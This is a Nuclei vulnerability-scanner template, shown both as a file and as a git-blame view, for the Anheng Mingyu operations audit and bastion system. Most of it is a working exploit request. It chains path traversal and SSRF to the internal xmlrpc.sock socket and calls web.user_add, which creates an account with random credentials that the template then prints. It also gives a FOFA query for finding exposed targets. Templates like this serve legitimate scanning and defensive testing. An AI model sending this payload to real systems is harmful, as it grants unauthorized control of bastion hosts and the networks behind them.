nuclei-templates/http/misconfiguration/mingyu-xmlrpc-sock-adduser....

id: mingyu-xmlrpc-sock-adduser

info:
  name: Mingyu Operation xmlrpc.sock - User Addition
  author: SleepingBag945
  severity: high
  description: |
    There is an SSRF vulnerability in the xmlrpc.sock interface of Anheng Mingyu operation and maintenance audit and risk control system, through which any user can be added to control the bastion machine
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-xmlrpc-sock-adduser.yaml
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1%E8%BF%90%E7%BB%B4%E5%AE%A1%E8%AE%A1%E4%B8%8E%E9%A3%8E%E9%99%A9%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%20xmlrpc.sock%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: "明御运维审计与风险控制系统"
  tags: mingyu,xmlrpc,sock,intrusive,misconfig
variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  random: "{{rand_base(4)}}"

http:
  - raw:
      - |
        POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://{{random}}/wsrpc HTTP/1.1
        Host: {{Hostname}}

        <?xml version="1.0"?>
        <methodCall>
        <methodName>web.user_add</methodName>
        <params>
        <param>
        <value>
        <array>
        <data>
        <value>
        <string>admin</string>
        </value>
        <value>
        <string>5</string>
        </value>
        <value>
        <string>10.0.0.1</string>
        </value>
        </data>
        </array>
        </value>
        </param>
        <param>
        <value>
        <struct>
        <member>
        <name>uname</name>
        <value>
        <string>{{username}}</string>
        </value>
        </member>
        <member>
        <name>name</name>
        <value>
        <string>{{username}}</string>
        </value>
        </member>
        <member>
        <name>pwd</name>
        <value>
        <string>{{password}}</string>
        </value>
        </member>
        <member>
        <name>authmode</name>
        <value>
        <string>1</string>
        </value>
        </member>
        <member>
        <name>deptid</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>email</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>mobile</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>comment</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>roleid</name>
        <value>
        <string>102</string>
        </value>
        </member>
        </struct></value>
        </param>
        </params>
        </methodCall>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/xml") && contains(body, "rolename") && contains(body, "authmode")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USERNAME: "+ username'
          - '"PASSWORD: "+ password'

# digest: 4a0a004730450220488a667a94a091971629a33cbf11fbfbe58905253a449022ffa03770c1768371022100ee2c1cb574e25e77c27e27a9f0469c3357de535acbebb531c7345f656103296b:922c64590222798bb761d5b6d8e72950
Create mingyu-xmlrpc-sock-adduser.yaml 2023-09-06 07:37:08 +00:00			`id: mingyu-xmlrpc-sock-adduser`

			`info:`
			`name: Mingyu Operation xmlrpc.sock - User Addition`
			`author: SleepingBag945`
			`severity: high`
			`description: \|`
			`There is an SSRF vulnerability in the xmlrpc.sock interface of Anheng Mingyu operation and maintenance audit and risk control system, through which any user can be added to control the bastion machine`
			`reference:`
			`- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-xmlrpc-sock-adduser.yaml`
			`- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1%E8%BF%90%E7%BB%B4%E5%AE%A1%E8%AE%A1%E4%B8%8E%E9%A3%8E%E9%99%A9%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%20xmlrpc.sock%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
Create mingyu-xmlrpc-sock-adduser.yaml 2023-09-06 07:37:08 +00:00			`fofa-query: "明御运维审计与风险控制系统"`
updated tag 2023-09-06 09:23:16 +00:00			`tags: mingyu,xmlrpc,sock,intrusive,misconfig`
Create mingyu-xmlrpc-sock-adduser.yaml 2023-09-06 07:37:08 +00:00			`variables:`
			`username: "{{rand_base(6)}}"`
			`password: "{{rand_base(8)}}"`
			`random: "{{rand_base(4)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock\|http://{{random}}/wsrpc HTTP/1.1`
			`Host: {{Hostname}}`

trailspace fix 2023-09-06 07:39:50 +00:00			`<?xml version="1.0"?>`
Create mingyu-xmlrpc-sock-adduser.yaml 2023-09-06 07:37:08 +00:00			`<methodCall>`
			`<methodName>web.user_add</methodName>`
			`<params>`
			`<param>`
			`<value>`
			`<array>`
			`<data>`
			`<value>`
			`<string>admin</string>`
			`</value>`
			`<value>`
			`<string>5</string>`
			`</value>`
			`<value>`
			`<string>10.0.0.1</string>`
			`</value>`
			`</data>`
			`</array>`
			`</value>`
			`</param>`
			`<param>`
			`<value>`
			`<struct>`
			`<member>`
			`<name>uname</name>`
			`<value>`
			`<string>{{username}}</string>`
			`</value>`
			`</member>`
			`<member>`
			`<name>name</name>`
			`<value>`
			`<string>{{username}}</string>`
			`</value>`
			`</member>`
			`<member>`
			`<name>pwd</name>`
			`<value>`
			`<string>{{password}}</string>`
			`</value>`
			`</member>`
			`<member>`
			`<name>authmode</name>`
			`<value>`
			`<string>1</string>`
			`</value>`
			`</member>`
			`<member>`
			`<name>deptid</name>`
			`<value>`
			`<string></string>`
			`</value>`
			`</member>`
			`<member>`
			`<name>email</name>`
			`<value>`
			`<string></string>`
			`</value>`
			`</member>`
			`<member>`
			`<name>mobile</name>`
			`<value>`
			`<string></string>`
			`</value>`
			`</member>`
			`<member>`
			`<name>comment</name>`
			`<value>`
			`<string></string>`
			`</value>`
			`</member>`
			`<member>`
			`<name>roleid</name>`
			`<value>`
			`<string>102</string>`
			`</value>`
			`</member>`
			`</struct></value>`
			`</param>`
			`</params>`
			`</methodCall>`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
			`- 'contains(header, "text/xml") && contains(body, "rolename") && contains(body, "authmode")'`
			`condition: and`

			`extractors:`
			`- type: dsl`
			`dsl:`
			`- '"USERNAME: "+ username'`
			`- '"PASSWORD: "+ password'`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a004730450220488a667a94a091971629a33cbf11fbfbe58905253a449022ffa03770c1768371022100ee2c1cb574e25e77c27e27a9f0469c3357de535acbebb531c7345f656103296b:922c64590222798bb761d5b6d8e72950`